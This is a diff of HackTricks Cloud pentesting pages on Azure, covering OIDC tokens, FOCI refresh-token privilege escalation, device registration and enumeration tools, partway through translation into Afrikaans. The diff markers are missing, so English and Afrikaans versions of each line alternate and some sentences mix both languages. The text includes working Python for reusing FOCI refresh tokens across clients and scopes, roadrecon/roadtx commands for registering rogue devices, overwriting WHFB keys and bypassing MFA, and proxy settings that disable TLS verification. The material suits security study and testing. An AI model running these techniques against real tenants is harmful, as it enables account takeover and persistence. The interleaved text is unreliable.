- **Security Implication:** An attacker can impersonate a public client application when requesting tokens, as there is no mechanism for the authorization server to verify the legitimacy of the application.
1. **Vertroulike Kliënte:**
- Besit hul eie geloofsbriewe (bv. wagwoorde of sertifikate).
- Kan **veilig hulself autentiseer** by die autoriseringsbediener.
2. **Publieke Kliënte:**
- Het nie unieke geloofsbriewe nie.
- Kan nie veilig autentiseer by die autoriseringsbediener nie.
- **Sekuriteitsimplikasie:** 'n Aanvaller kan 'n publieke kliënttoepassing naboots wanneer hy tokens aan vra, aangesien daar geen meganisme is vir die autoriseringsbediener om die legitimiteit van die toepassing te verifieer nie.
## Authentication Tokens
There are **three types of tokens** used in OIDC:
Daar is **drie tipes tokens** wat in OIDC gebruik word:
- [**Access Tokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** The client presents this token to the resource server to **access resources**. It can be used only for a specific combination of user, client, and resource and **cannot be revoked** until expiry - that is 1 hour by default.
- **ID Tokens**: The client receives this **token from the authorization server**. It contains basic information about the user. It is **bound to a specific combination of user and client**.
- **Refresh Tokens**: Provided to the client with access token. Used to **get new access and ID tokens**. It is bound to a specific combination of user and client and can be revoked. Default expiry is **90 days** for inactive refresh tokens and **no expiry for active tokens** (be from a refresh token is possible to get new refresh tokens).
- A refresh token should be tied to an **`aud`** , to some **scopes**, and to a **tenant** and it should only be able to generate access tokens for that aud, scopes (and no more) and tenant. However, this is not the case with **FOCI applications tokens**.
- A refresh token is encrypted and only Microsoft can decrypt it.
- Getting a new refresh token doesn't revoke the previous refresh token.
- [**Toegangstokens**](https://learn.microsoft.com/en-us/azure/active-directory/develop/access-tokens)**:** Die kliënt bied hierdie token aan die hulpbronbediener aan om **toegang tot hulpbronne** te verkry. Dit kan slegs gebruik word vir 'n spesifieke kombinasie van gebruiker, kliënt en hulpbron en **kan nie herroep word** tot vervaldatum nie - dit is 1 uur per standaard.
- **ID Tokens**: Die kliënt ontvang hierdie **token van die autoriseringsbediener**. Dit bevat basiese inligting oor die gebruiker. Dit is **gebind aan 'n spesifieke kombinasie van gebruiker en kliënt**.
- **Herfris Tokens**: Verskaf aan die kliënt saam met toegangstoken. Gebruik om **nuwe toegang en ID tokens te verkry**. Dit is gebind aan 'n spesifieke kombinasie van gebruiker en kliënt en kan herroep word. Standaard vervaldatum is **90 dae** vir inaktiewe herfris tokens en **geen vervaldatum vir aktiewe tokens** (dit is moontlik om nuwe herfris tokens van 'n herfris token te verkry).
- 'n Herfris token moet gekoppel wees aan 'n **`aud`**, aan sekere **skoppe**, en aan 'n **tenant** en dit moet slegs in staat wees om toegangstokens vir daardie aud, skoppe (en nie meer nie) en tenant te genereer. Dit is egter nie die geval met **FOCI toepassings tokens** nie.
- 'n Herfris token is versleuteld en slegs Microsoft kan dit ontsleutel.
- Om 'n nuwe herfris token te verkry, herroep nie die vorige herfris token nie.
> [!WARNING]
> Information for **conditional access** is **stored** inside the **JWT**. So, if you request the **token from an allowed IP address**, that **IP** will be **stored** in the token and then you can use that token from a **non-allowed IP to access the resources**.
> Inligting vir **voorwaardelike toegang** is **gestoor** binne die **JWT**. So, as jy die **token van 'n toegelate IP-adres** aan vra, sal daardie **IP** in die token **gestoor** word en dan kan jy daardie token van 'n **nie-toegelate IP gebruik om toegang tot die hulpbronne** te verkry.
### Access Tokens "aud"
The field indicated in the "aud" field is the **resource server** (the application) used to perform the login.
Die veld wat in die "aud" veld aangedui word, is die **hulpbronbediener** (die toepassing) wat gebruik word om die aanmelding uit te voer.
The command `az account get-access-token --resource-type [...]` supports the following types and each of them will add a specific "aud" in the resulting access token:
Die opdrag `az account get-access-token --resource-type [...]` ondersteun die volgende tipes en elkeen van hulle sal 'n spesifieke "aud" in die resulterende toegangstoken voeg:
> [!CAUTION]
> Note that the following are just the APIs supported by `az account get-access-token` but there are more.
> Let daarop dat die volgende net die API's is wat deur `az account get-access-token` ondersteun word, maar daar is meer.
<details>
<summary>aud examples</summary>
<summary>aud voorbeelde</summary>
- **aad-graph (Azure Active Directory Graph API)**: Used to access the legacy Azure AD Graph API (deprecated), which allows applications to read and write directory data in Azure Active Directory (Azure AD).
- `https://graph.windows.net/`
- **aad-graph (Azure Active Directory Graph API)**: Gebruik om toegang te verkry tot die ouer Azure AD Graph API (verouderd), wat toepassings toelaat om gidsdata in Azure Active Directory (Azure AD) te lees en te skryf.
- `https://graph.windows.net/`
* **arm (Azure Resource Manager)**: Used to manage Azure resources through the Azure Resource Manager API. This includes operations like creating, updating, and deleting resources such as virtual machines, storage accounts, and more.
- `https://management.core.windows.net/ or https://management.azure.com/`
* **arm (Azure Resource Manager)**: Gebruik om Azure hulpbronne te bestuur deur die Azure Resource Manager API. Dit sluit operasies in soos die skep, opdateer en verwyder van hulpbronne soos virtuele masjiene, stoor rekeninge, en meer.
- `https://management.core.windows.net/ of https://management.azure.com/`
- **batch (Azure Batch Services)**: Used to access Azure Batch, a service that enables large-scale parallel and high-performance computing applications efficiently in the cloud.
- `https://batch.core.windows.net/`
- **batch (Azure Batch Services)**: Gebruik om toegang te verkry tot Azure Batch, 'n diens wat grootmaat parallelle en hoë-prestasie rekenaar toepassings doeltreffend in die wolk moontlik maak.
- `https://batch.core.windows.net/`
* **data-lake (Azure Data Lake Storage)**: Used to interact with Azure Data Lake Storage Gen1, which is a scalable data storage and analytics service.
- `https://datalake.azure.net/`
* **data-lake (Azure Data Lake Storage)**: Gebruik om te kommunikeer met Azure Data Lake Storage Gen1, wat 'n skaalbare data berging en analise diens is.
- `https://datalake.azure.net/`
- **media (Azure Media Services)**: Used to access Azure Media Services, which provide cloud-based media processing and delivery services for video and audio content.
- `https://rest.media.azure.net`
- **media (Azure Media Services)**: Gebruik om toegang te verkry tot Azure Media Services, wat wolk-gebaseerde media verwerking en aflewering dienste vir video en klank inhoud bied.
- `https://rest.media.azure.net`
* **ms-graph (Microsoft Graph API)**: Used to access the Microsoft Graph API, the unified endpoint for Microsoft 365 services data. It allows you to access data and insights from services like Azure AD, Office 365, Enterprise Mobility, and Security services.
- `https://graph.microsoft.com`
* **ms-graph (Microsoft Graph API)**: Gebruik om toegang te verkry tot die Microsoft Graph API, die verenigde eindpunt vir Microsoft 365 dienste data. Dit laat jou toe om data en insigte van dienste soos Azure AD, Office 365, Enterprise Mobility, en Sekuriteitsdienste te verkry.
- `https://graph.microsoft.com`
- **oss-rdbms (Azure Open Source Relational Databases)**: Used to access Azure Database services for open-source relational database engines like MySQL, PostgreSQL, and MariaDB.
- `https://ossrdbms-aad.database.windows.net`
- **oss-rdbms (Azure Open Source Relational Databases)**: Gebruik om toegang te verkry tot Azure Databasis dienste vir oopbron relationele databasis enjin soos MySQL, PostgreSQL, en MariaDB.
- `https://ossrdbms-aad.database.windows.net`
</details>
### Access Tokens Scopes "scp"
### Access Tokens Skoppe "scp"
The scope of an access token is stored inside the scp key inside the access token JWT. These scopes define what the access token has access to.
Die skop van 'n toegangstoken word binne die scp sleutel binne die toegangstoken JWT gestoor. Hierdie skoppe definieer waartoe die toegangstoken toegang het.
If a JWT is allowed to contact an specific API but **doesn't have the scope** to perform the requested action, it **won't be able to perform the action** with that JWT.
### Get refresh & access token example
As 'n JWT toegelaat word om 'n spesifieke API te kontak, maar **nie die skop het** om die aangevraagde aksie uit te voer nie, sal dit **nie in staat wees om die aksie** met daardie JWT uit te voer nie.
### Kry herfris & toegang token voorbeeld
```python
# Code example from https://github.com/secureworks/family-of-client-ids-research
import msal
@@ -107,17 +106,17 @@ from typing import Any, Dict, List
# LOGIN VIA CODE FLOW AUTHENTICATION
azure_cli_client = msal.PublicClientApplication(
"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
"04b07795-8ddb-461a-bbee-02f9e1bf7b46" # ID for Azure CLI client
)
device_flow = azure_cli_client.initiate_device_flow(
scopes=["https://graph.microsoft.com/.default"]
scopes=["https://graph.microsoft.com/.default"]
)
print(device_flow["message"])
# Perform device code flow authentication
azure_cli_bearer_tokens_for_graph_api = azure_cli_client.acquire_token_by_device_flow(
device_flow
device_flow
)
pprint(azure_cli_bearer_tokens_for_graph_api)
@@ -125,83 +124,74 @@ pprint(azure_cli_bearer_tokens_for_graph_api)
# DECODE JWT
def decode_jwt(base64_blob: str) -> Dict[str, Any]:
"""Decodes base64 encoded JWT blob"""
return jwt.decode(
base64_blob, options={"verify_signature": False, "verify_aud": False}
)
"""Decodes base64 encoded JWT blob"""
return jwt.decode(
base64_blob, options={"verify_signature": False, "verify_aud": False}
)
decoded_access_token = decode_jwt(
azure_cli_bearer_tokens_for_graph_api.get("access_token")
azure_cli_bearer_tokens_for_graph_api.get("access_token")
)
pprint(decoded_access_token)
# GET NEW ACCESS TOKEN AND REFRESH TOKEN
new_azure_cli_bearer_tokens_for_graph_api = (
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
# Same scopes as original authorization
scopes=["https://graph.microsoft.com/.default"],
)
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
azure_cli_bearer_tokens_for_graph_api.get("refresh_token"),
# Same scopes as original authorization
scopes=["https://graph.microsoft.com/.default"],
)
)
pprint(new_azure_cli_bearer_tokens_for_graph_api)
```
## FOCI Tokens Privilege Escalation
Previously it was mentioned that refresh tokens should be tied to the **scopes** it was generated with, to the **application** and **tenant** it was generated to. If any of these boundaries is broken, it's possible to escalate privileges as it will be possible to generate access tokens to other resources and tenants the user has access to and with more scopes than it was originally intended.
Voorheen is genoem dat verfrissingstokens aan die **scopes** waaraan dit gegenereer is, aan die **toepassing** en **huurder** waaraan dit gegenereer is, gekoppel moet wees. As enige van hierdie grense oorgesteek word, is dit moontlik om voorregte te verhoog, aangesien dit moontlik sal wees om toegangstokens vir ander hulpbronne en huurders te genereer waartoe die gebruiker toegang het en met meer scopes as wat oorspronklik bedoel was.
Moreover, **this is possible with all refresh tokens** in the [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra accounts, Microsoft personal accounts, and social accounts like Facebook and Google) because as the [**docs**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) mention: "Refresh tokens are bound to a combination of user and client, but **aren't tied to a resource or tenant**. A client can use a refresh token to acquire access tokens **across any combination of resource and tenant** where it has permission to do so. Refresh tokens are encrypted and only the Microsoft identity platform can read them."
Boonop, **dit is moontlik met alle verfrissingstokens** in die [Microsoft identity platform](https://learn.microsoft.com/en-us/entra/identity-platform/) (Microsoft Entra-rekeninge, Microsoft persoonlike rekeninge, en sosiale rekeninge soos Facebook en Google) omdat die [**dokumentasie**](https://learn.microsoft.com/en-us/entra/identity-platform/refresh-tokens) noem: "Verfrissingstokens is gebonde aan 'n kombinasie van gebruiker en kliënt, maar **is nie aan 'n hulpbron of huurder gekoppel nie**. 'n Kliënt kan 'n verfrissingstoken gebruik om toegangstokens te verkry **oor enige kombinasie van hulpbron en huurder** waar dit toestemming het om dit te doen. Verfrissingstokens is versleuteld en slegs die Microsoft identity platform kan dit lees."
Moreover, note that the FOCI applications are public applications, so **no secret is needed** to authenticate to the server.
Boonop, let daarop dat die FOCI-toepassings openbare toepassings is, so **geen geheim is nodig** om by die bediener te autentiseer.
Then known FOCI clients reported in the [**original research**](https://github.com/secureworks/family-of-client-ids-research/tree/main) can be [**found here**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
Dan bekende FOCI-kliënte wat in die [**oorspronklike navorsing**](https://github.com/secureworks/family-of-client-ids-research/tree/main) gerapporteer is, kan [**hier gevind word**](https://github.com/secureworks/family-of-client-ids-research/blob/main/known-foci-clients.csv).
### Get different scope
Following with the previous example code, in this code it's requested a new token for a different scope:
Volgende met die vorige voorbeeldkode, in hierdie kode word 'n nuwe token vir 'n ander scope aangevra:
```python
# Code from https://github.com/secureworks/family-of-client-ids-research
azure_cli_bearer_tokens_for_outlook_api = (
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
new_azure_cli_bearer_tokens_for_graph_api.get(
"refresh_token"
),
# But different scopes than original authorization
scopes=[
"https://outlook.office.com/.default"
],
)
# Same client as original authorization
azure_cli_client.acquire_token_by_refresh_token(
new_azure_cli_bearer_tokens_for_graph_api.get(
"refresh_token"
),
# But different scopes than original authorization
scopes=[
"https://outlook.office.com/.default"
],
)
)
pprint(azure_cli_bearer_tokens_for_outlook_api)
```
### Get different client and scopes
### Kry verskillende kliënt en skope
```python
# Code from https://github.com/secureworks/family-of-client-ids-research
microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c")
microsoft_office_bearer_tokens_for_graph_api = (
# This is a different client application than we used in the previous examples
microsoft_office_client.acquire_token_by_refresh_token(
# But we can use the refresh token issued to our original client application
azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
# And request different scopes too
scopes=["https://graph.microsoft.com/.default"],
)
# This is a different client application than we used in the previous examples
microsoft_office_client.acquire_token_by_refresh_token(
# But we can use the refresh token issued to our original client application
azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
# And request different scopes too
scopes=["https://graph.microsoft.com/.default"],
)
)
# How is this possible?
pprint(microsoft_office_bearer_tokens_for_graph_api)
```
## References
## Verwysings
- [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research)
{{#include ../../../banners/hacktricks-training.md}}

66
src/pentesting-cloud/azure-security/az-device-registration.md
View File

@@ -4,21 +4,19 @@
## Basic Information
When a device joins AzureAD a new object is created in AzureAD.
Wanneer 'n toestel by AzureAD aansluit, word 'n nuwe objek in AzureAD geskep.
When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt.
Wanneer 'n toestel geregistreer word, **word die gebruiker gevra om in te log met sy rekening** (wat MFA vra indien nodig), dan versoek dit tokens vir die toestelregistrasiediens en vra dan 'n finale bevestigingsprompt.
Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible.
Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).:
Dan word twee RSA-sleutelpaar in die toestel gegenereer: Die **toestelsleutel** (**publieke** sleutel) wat na **AzureAD** gestuur word en die **transport** sleutel (**private** sleutel) wat in TPM gestoor word indien moontlik.
Dan word die **objek** in **AzureAD** geskep (nie in Intune nie) en AzureAD gee 'n **sertifikaat** wat deur dit onderteken is, terug aan die toestel. Jy kan nagaan dat die **toestel AzureAD-verbonden** is en inligting oor die **sertifikaat** (soos of dit deur TPM beskerm word).
```bash
dsregcmd /status
```
Na die toestelregistrasie word 'n **Primary Refresh Token** deur die LSASS CloudAP-module aangevra en aan die toestel gegee. Met die PRT word ook die **sessiesleutel versleuteld sodat slegs die toestel dit kan ontsleutel** (met die publieke sleutel van die vervoersleutel) en dit is **nodig om die PRT te gebruik.**
After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.**
For more information about what is a PRT check:
Vir meer inligting oor wat 'n PRT is, kyk:
{{#ref}}
az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -26,19 +24,18 @@ az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
### TPM - Trusted Platform Module
The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\
But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights.
Die **TPM** **beskerm** teen sleutel **onttrekking** van 'n afgeskakel toestel (as dit deur 'n PIN beskerm word) en teen die onttrekking van die private materiaal uit die OS-laag.\
Maar dit **beskerm nie** teen **sniffing** van die fisiese verbinding tussen die TPM en CPU of **gebruik van die kriptografiese materiaal** in die TPM terwyl die stelsel loop vanaf 'n proses met **SYSTEM** regte.
If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys):
As jy die volgende bladsy kyk, sal jy sien dat **diefstal van die PRT** gebruik kan word om toegang te verkry soos 'n **gebruiker**, wat wonderlik is omdat die **PRT op toestelle geleë is**, so dit kan van hulle gesteel word (of as dit nie gesteel word, misbruik word om nuwe ondertekeningsleutels te genereer):
{{#ref}}
az-lateral-movement-cloud-on-prem/pass-the-prt.md
{{#endref}}
## Registering a device with SSO tokens
It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it:
## Registrasie van 'n toestel met SSO tokens
Dit sou moontlik wees vir 'n aanvaller om 'n token vir die Microsoft toestelregistrasiediens van die gecompromitteerde toestel aan te vra en dit te registreer:
```bash
# Initialize SSO flow
roadrecon auth prt-init
@@ -50,49 +47,46 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie <cookie>
# Custom pyhton script to register a device (check roadtx)
registerdevice.py
```
Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**.
Which will give you a **sertifikaat wat jy kan gebruik om in die toekoms vir PRTs te vra**. Daarom om volharding te handhaaf en **MFA te omseil** omdat die oorspronklike PRT-token wat gebruik is om die nuwe toestel te registreer **reeds MFA-toestemmings toegeken het**.
> [!TIP]
> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**.
> Let daarop dat jy toestemming nodig het om **nuwe toestelle te registreer** om hierdie aanval uit te voer. Ook, die registrasie van 'n toestel beteken nie dat die toestel **toegelaat sal word om in Intune te registreer** nie.
> [!CAUTION]
> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
> Hierdie aanval is in September 2021 reggestel aangesien jy nie meer nuwe toestelle kan registreer met 'n SSO-token nie. Dit is egter steeds moontlik om toestelle op 'n wettige manier te registreer (met gebruikersnaam, wagwoord en MFA indien nodig). Kyk: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
## Overwriting a device ticket
## Oorskrywing van 'n toestelkaartjie
It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A).
Dit was moontlik om 'n **toestelkaartjie aan te vra**, die huidige een van die toestel te **oorskryf**, en tydens die vloei die **PRT te steel** (so geen behoefte om dit van die TPM te steel nie. Vir meer inligting [**kyk na hierdie praatjie**](https://youtu.be/BduCn8cLV1A).
<figure><img src="../../images/image (32).png" alt=""><figcaption></figcaption></figure>
> [!CAUTION]
> However, this was fixed.
> Dit is egter reggestel.
## Overwrite WHFB key
## Oorskrywing van WHFB-sleutel
[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
[**Kyk die oorspronklike skyfies hier**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
Attack summary:
Aanval opsomming:
- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO
- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key
- This also provides **persistence**
- Dit is moontlik om die **geregistreerde WHFB** sleutel van 'n **toestel** via SSO te **oorskryf**
- Dit **verslaan TPM-beskerming** aangesien die sleutel **gesnif word tydens die generasie** van die nuwe sleutel
- Dit bied ook **volharding**
<figure><img src="../../images/image (34).png" alt=""><figcaption></figcaption></figure>
Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph.
Then, it's possible to generate a new key with:
Gebruikers kan hul eie searchableDeviceKey eienskap via die Azure AD Graph wysig, egter, die aanvaller moet 'n toestel in die tenant hê (geregistreer op die vlug of 'n gesteelde sertifikaat + sleutel van 'n wettige toestel hê) en 'n geldige toegangstoken vir die AAD Graph.
Dan is dit moontlik om 'n nuwe sleutel te genereer met:
```bash
roadtx genhellokey -d <device id> -k tempkey.key
```
and then PATCH the information of the searchableDeviceKey:
en dan PATCH die inligting van die searchableDeviceKey:
<figure><img src="../../images/image (36).png" alt=""><figcaption></figcaption></figure>
It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check:
Dit is moontlik om 'n toegangstoken van 'n gebruiker te verkry via **device code phishing** en die vorige stappe te misbruik om **sy toegang te steel**. Vir meer inligting, kyk:
{{#ref}}
az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -100,14 +94,10 @@ az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-en
<figure><img src="../../images/image (37).png" alt=""><figcaption></figcaption></figure>
## References
## Verwysings
- [https://youtu.be/BduCn8cLV1A](https://youtu.be/BduCn8cLV1A)
- [https://www.youtube.com/watch?v=x609c-MUZ_g](https://www.youtube.com/watch?v=x609c-MUZ_g)
- [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY)
{{#include ../../banners/hacktricks-training.md}}

80
src/pentesting-cloud/azure-security/az-enumeration-tools.md
View File

@@ -2,10 +2,10 @@
{{#include ../../banners/hacktricks-training.md}}
## Install PowerShell in Linux
## Installeer PowerShell in Linux
> [!TIP]
> In linux you will need to install PowerShell Core:
> In linux moet jy PowerShell Core installeer:
>
> ```bash
> sudo apt-get update
@@ -14,11 +14,11 @@
> # Ubuntu 20.04
> wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
>
> # Update repos
> # Werk repos op
> sudo apt-get update
> sudo add-apt-repository universe
>
> # Install & start powershell
> # Installeer & begin powershell
> sudo apt-get install -y powershell
> pwsh
>
@@ -26,58 +26,47 @@
> curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
> ```
## Install PowerShell in MacOS
## Installeer PowerShell in MacOS
Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
1. Install `brew` if not installed yet:
Instruksies van die [**dokumentasie**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
1. Installeer `brew` as dit nog nie geïnstalleer is nie:
```bash
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
```
2. Install the latest stable release of PowerShell:
2. Installeer die nuutste stabiele weergawe van PowerShell:
```sh
brew install powershell/tap/powershell
```
3. Run PowerShell:
3. Voer PowerShell uit:
```sh
pwsh
```
4. Update:
4. Opdatering:
```sh
brew update
brew upgrade powershell
```
## Main Enumeration Tools
## Hoof Enumerasie Gereedskap
### az cli
[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts.
[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is 'n kruis-platform hulpmiddel geskryf in Python vir die bestuur en administrasie van (meeste) Azure en Entra ID hulpbronne. Dit maak verbinding met Azure en voer administratiewe opdragte uit via die opdraglyn of skripte.
Follow this link for the [**installation instructions¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
Volg hierdie skakel vir die [**installasie instruksies¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
Commands in Azure CLI are structured using a pattern of: `az <service> <action> <parameters>`
Opdragte in Azure CLI is gestruktureer volgens 'n patroon van: `az <service> <action> <parameters>`
#### Debug | MitM az cli
Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
Deur die parameter **`--debug`** is dit moontlik om al die versoeke wat die hulpmiddel **`az`** stuur te sien:
```bash
az account management-group list --output table --debug
```
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
Om 'n **MitM** op die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy doen:
{{#tabs }}
{{#tab name="Bash" }}
```bash
export ADAL_PYTHON_SSL_NO_VERIFY=1
export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -90,64 +79,53 @@ export HTTP_PROXY="http://127.0.0.1:8080"
openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
```
{{#endtab }}
{{#tab name="PS" }}
```bash
$env:ADAL_PYTHON_SSL_NO_VERIFY=1
$env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
$env:HTTPS_PROXY="http://127.0.0.1:8080"
$env:HTTP_PROXY="http://127.0.0.1:8080"
```
{{#endtab }}
{{#endtabs }}
### Az PowerShell
Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line.
Azure PowerShell is 'n module met cmdlets om Azure hulpbronne direk vanaf die PowerShell-opdraglyn te bestuur.
Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
Volg hierdie skakel vir die [**installasie-instruksies**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
Commands in Azure PowerShell AZ Module are structured like: `<Action>-Az<Service> <parameters>`
Opdragte in Azure PowerShell AZ Module is gestruktureer soos: `<Action>-Az<Service> <parameters>`
#### Debug | MitM Az PowerShell
Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
Deur die parameter **`-Debug`** is dit moontlik om al die versoeke wat die hulpmiddel stuur te sien:
```bash
Get-AzResourceGroup -Debug
```
In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
Om 'n **MitM** op die hulpmiddel te doen en **al die versoeke** wat dit handmatig stuur te kontroleer, kan jy die omgewing veranderlikes `HTTPS_PROXY` en `HTTP_PROXY` instel volgens die [**dokumentasie**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
### Microsoft Graph PowerShell
Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features.
Microsoft Graph PowerShell is 'n kruis-platform SDK wat toegang tot al die Microsoft Graph API's moontlik maak, insluitend dienste soos SharePoint, Exchange, en Outlook, met 'n enkele eindpunt. Dit ondersteun PowerShell 7+, moderne verifikasie via MSAL, eksterne identiteite, en gevorderde navrae. Met 'n fokus op die minste privaatheidstoegang, verseker dit veilige bedrywighede en ontvang gereelde opdaterings om in lyn te wees met die nuutste Microsoft Graph API kenmerke.
Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
Volg hierdie skakel vir die [**installasie instruksies**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
Commands in Microsoft Graph PowerShell are structured like: `<Action>-Mg<Service> <parameters>`
Opdragte in Microsoft Graph PowerShell is gestruktureer soos: `<Action>-Mg<Service> <parameters>`
#### Debug Microsoft Graph PowerShell
Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
#### Foutopsporing van Microsoft Graph PowerShell
Met die parameter **`-Debug`** is dit moontlik om al die versoeke wat die hulpmiddel stuur te sien:
```bash
Get-MgUser -Debug
```
### ~~**AzureAD Powershell**~~
The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID.
Die Azure Active Directory (AD) module, nou **verouderd**, is deel van Azure PowerShell vir die bestuur van Azure AD hulpbronne. Dit bied cmdlets vir take soos die bestuur van gebruikers, groepe, en aansoekregistrasies in Entra ID.
> [!TIP]
> This is replaced by Microsoft Graph PowerShell
Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD).
> Dit is vervang deur Microsoft Graph PowerShell
Volg hierdie skakel vir die [**installasie-instruksies**](https://www.powershellgallery.com/packages/AzureAD).

42
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
View File

@@ -4,17 +4,16 @@
### Identifying the Issues
Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1.
Azure Arc stel die integrasie van nuwe interne bedieners (aangeslote domeinbedieners) in Azure Arc via die Groep Beleidsobjek metode moontlik. Om dit te fasiliteer, bied Microsoft 'n ontplooiing toolkit wat nodig is om die aanmeldproses te begin. Binne die ArcEnableServerGroupPolicy.zip lêer, kan die volgende skripte gevind word: DeployGPO.ps1, EnableAzureArc.ps1, en AzureArcDeployment.psm1.
When executed, the DeployGPO.ps1 script performs the following actions:
Wanneer uitgevoer, voer die DeployGPO.ps1 skrip die volgende aksies uit:
1. Creates the Azure Arc Servers Onboarding GPO within the local domain.
